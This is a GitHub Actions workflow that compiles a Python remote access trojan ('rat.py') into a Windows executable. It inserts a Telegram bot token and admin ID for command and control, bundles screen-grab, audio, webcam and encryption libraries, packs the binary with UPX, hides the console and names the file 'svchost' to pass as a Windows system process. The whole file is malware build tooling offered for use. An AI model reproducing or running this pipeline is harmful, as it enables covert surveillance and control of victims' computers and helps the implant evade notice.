name: Build Python Rat EXE

on:
  workflow_dispatch:
    inputs:
      token:
        description: 'Bot Token'
        required: true
        type: string
      admin_id:
        description: 'Admin ID'
        required: true
        type: string

jobs:
  build:
    runs-on: windows-latest
    
    steps:
      - name: Setup Python
        uses: actions/setup-python@v5
        with:
          python-version: '3.10'
      
      - name: Checkout code
        uses: actions/checkout@v4
      
      - name: Install dependencies
        run: |
          pip install pyinstaller
          pip install python-telegram-bot==13.15 pillow psutil requests sounddevice soundfile cryptography opencv-python numpy pycaw comtypes gputil win10toast
      
      - name: Install UPX
        run: choco install upx -y
      
      - name: Replace token and admin_id in rat.py
        run: |
          python -c "
          import re
          with open('rat.py', 'r', encoding='utf-8') as f:
              content = f.read()
          content = content.replace('{{TOKEN}}', '${{ inputs.token }}')
          content = content.replace('{{ADMIN_ID}}', '${{ inputs.admin_id }}')
          with open('rat.py', 'w', encoding='utf-8') as f:
              f.write(content)
          "
      
      - name: Build EXE (32-bit, без консоли, с UPX)
        run: |
          pyinstaller --onefile --windowed --name "svchost" --target-arch x86 --upx-dir="C:\ProgramData\chocolatey\lib\upx\tools" --hidden-import telegram --hidden-import telegram.ext --hidden-import PIL --hidden-import PIL.ImageGrab --hidden-import psutil --hidden-import requests --hidden-import sounddevice --hidden-import soundfile --hidden-import cryptography --hidden-import cryptography.fernet --hidden-import tkinter --hidden-import pycaw --hidden-import comtypes --hidden-import cv2 --hidden-import numpy --hidden-import GPUtil --hidden-import win10toast --collect-all telegram rat.py
      
      - name: Upload EXE
        uses: actions/upload-artifact@v4
        with:
          name: Rat
          path: dist/*.exe
          retention-days: 1
